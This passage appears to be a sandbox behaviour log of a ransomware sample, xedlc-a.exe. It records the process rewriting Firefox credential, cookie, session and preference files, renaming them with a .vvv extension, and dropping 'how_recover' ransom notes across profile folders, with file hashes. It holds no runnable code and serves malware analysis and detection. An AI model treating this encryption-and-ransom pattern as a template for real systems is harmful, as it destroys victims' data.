- sha1sum: f486f297a818b14e964e52adaa801d6c37125a2b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt.vvv
- ads:
- fid (ads:): 1125899906897485
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86826
- mode: created
- sequenceNumber: 1462
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778387
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86833
- mode: close
- sequenceNumber: 1463
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778387
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86842
- mode: created
- sequenceNumber: 1464
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778388
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86849
- mode: close
- sequenceNumber: 1465
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778388
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86857
- mode: created
- sequenceNumber: 1466
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778389
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86864
- mode: close
- sequenceNumber: 1467
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778389
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86894
- mode: created
- sequenceNumber: 1468
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778390
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86900
- mode: close
- sequenceNumber: 1469
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778390
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86909
- mode: created
- sequenceNumber: 1470
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\minidumps\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778391
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86915
- mode: close
- sequenceNumber: 1471
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\minidumps\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778391
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86923
- mode: created
- sequenceNumber: 1472
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\minidumps\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778392
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86930
- mode: close
- sequenceNumber: 1473
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\minidumps\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778392
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86939
- mode: open
- sequenceNumber: 1474
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\prefs.js
- filesize: 3672
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1970324837029481
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86987
- mode: close
- sequenceNumber: 1475
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\prefs.js
- filesize: 4094
- md5sum: db6d5b4b813683dd8d9ff445b852f05b
- sha1sum: ff95c969d9c5c587668104e38ab0069d6b270c62
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1970324837029481
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87105
- mode: rename
- sequenceNumber: 1476
- filesize: 4094
- md5sum: db6d5b4b813683dd8d9ff445b852f05b
- sha1sum: ff95c969d9c5c587668104e38ab0069d6b270c62
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\prefs.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\prefs.js.vvv
- ads:
- fid (ads:): 1970324837029481
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87180
- mode: open
- sequenceNumber: 1477
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons2.txt
- filesize: 157
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478847
- ntstatus: 0x0
- CreateOptions: 0x200000
- file:
- timestamp: 87232
- mode: close
- sequenceNumber: 1478
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons2.txt
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478847
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87250
- mode: rename
- sequenceNumber: 1479
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons2.txt
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons2.txt.vvv
- ads:
- fid (ads:): 562949953478847
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87298
- mode: open
- sequenceNumber: 1480
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons3.txt
- filesize: 157
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478848
- ntstatus: 0x0
- CreateOptions: 0x200000
- file:
- timestamp: 87307
- mode: close
- sequenceNumber: 1481
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons3.txt
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478848
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87317
- mode: rename
- sequenceNumber: 1482
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons3.txt
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons3.txt.vvv
- ads:
- fid (ads:): 562949953478848
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87326
- mode: created
- sequenceNumber: 1483
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778393
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87332
- mode: close
- sequenceNumber: 1484
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778393
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87339
- mode: created
- sequenceNumber: 1485
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778394
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87346
- mode: close
- sequenceNumber: 1486
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778394
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87356
- mode: created
- sequenceNumber: 1487
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\bookmarkbackups\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778395
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87363
- mode: close
- sequenceNumber: 1488
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\bookmarkbackups\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778395
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87424
- mode: created
- sequenceNumber: 1489
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\bookmarkbackups\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778396
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87431
- mode: close
- sequenceNumber: 1490
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\bookmarkbackups\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778396
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87438
- mode: open
- sequenceNumber: 1491
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\cookies.txt
- filesize: 157
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478840
- ntstatus: 0x0
- CreateOptions: 0x200000
- file:
- timestamp: 87447
- mode: close
- sequenceNumber: 1492
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\cookies.txt
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478840
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87457
- mode: rename
- sequenceNumber: 1493
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\cookies.txt
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\cookies.txt.vvv
- ads:
- fid (ads:): 562949953478840
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87467
- mode: created
- sequenceNumber: 1494
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\extensions\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778397
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87474
- mode: close
- sequenceNumber: 1495
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\extensions\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778397
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87481
- mode: created
- sequenceNumber: 1496
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\extensions\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778398
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87488
- mode: close
- sequenceNumber: 1497
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\extensions\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778398
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87496
- mode: created
- sequenceNumber: 1498
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\minidumps\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778399
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87503
- mode: close
- sequenceNumber: 1499
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\minidumps\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778399
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87512
- mode: created
- sequenceNumber: 1500
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\minidumps\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778400
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87518
- mode: close
- sequenceNumber: 1501
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\minidumps\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778400
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87526
- mode: open
- sequenceNumber: 1502
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\prefs.js
- filesize: 6989
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1970324837042125
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87810
- mode: close
- sequenceNumber: 1503
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\prefs.js
- filesize: 7406
- md5sum: c3c4965552caf2b5e1a2cb756e63fbb7
- sha1sum: 37b18709954868d737477f829e0e4fa1ff335ab4
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1970324837042125
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87819
- mode: rename
- sequenceNumber: 1504
- filesize: 7406
- md5sum: c3c4965552caf2b5e1a2cb756e63fbb7
- sha1sum: 37b18709954868d737477f829e0e4fa1ff335ab4
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\prefs.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\prefs.js.vvv
- ads:
- fid (ads:): 1970324837042125
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87828
- mode: open
- sequenceNumber: 1505
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\sessionstore.js
- filesize: 781
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1407374883607848
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87880
- mode: close
- sequenceNumber: 1506
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\sessionstore.js
- filesize: 1198
- md5sum: 8c036e1d6d47b5a2734d1cd415c4b2dd
- sha1sum: 033abdba48ba2d616bb01ef0e538f8c80b359ddf
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1407374883607848
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87889
- mode: rename
- sequenceNumber: 1507
- filesize: 1198
- md5sum: 8c036e1d6d47b5a2734d1cd415c4b2dd
- sha1sum: 033abdba48ba2d616bb01ef0e538f8c80b359ddf
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\sessionstore.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\sessionstore.js.vvv
- ads:
- fid (ads:): 1407374883607848
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87898
- mode: open
- sequenceNumber: 1508
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons2.txt
- filesize: 157
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 32932572275204275
- ntstatus: 0x0
- CreateOptions: 0x200000
- file:
- timestamp: 87907
- mode: close
- sequenceNumber: 1509
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons2.txt
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 32932572275204275
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87918
- mode: rename
- sequenceNumber: 1510
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons2.txt
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons2.txt.vvv
- ads:
- fid (ads:): 32932572275204275
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87927
- mode: open
- sequenceNumber: 1511
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons3.txt
- filesize: 157
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478836
- ntstatus: 0x0
- CreateOptions: 0x200000
- file:
- timestamp: 87935
- mode: close
- sequenceNumber: 1512
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons3.txt
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478836
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87946
- mode: rename
- sequenceNumber: 1513
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons3.txt
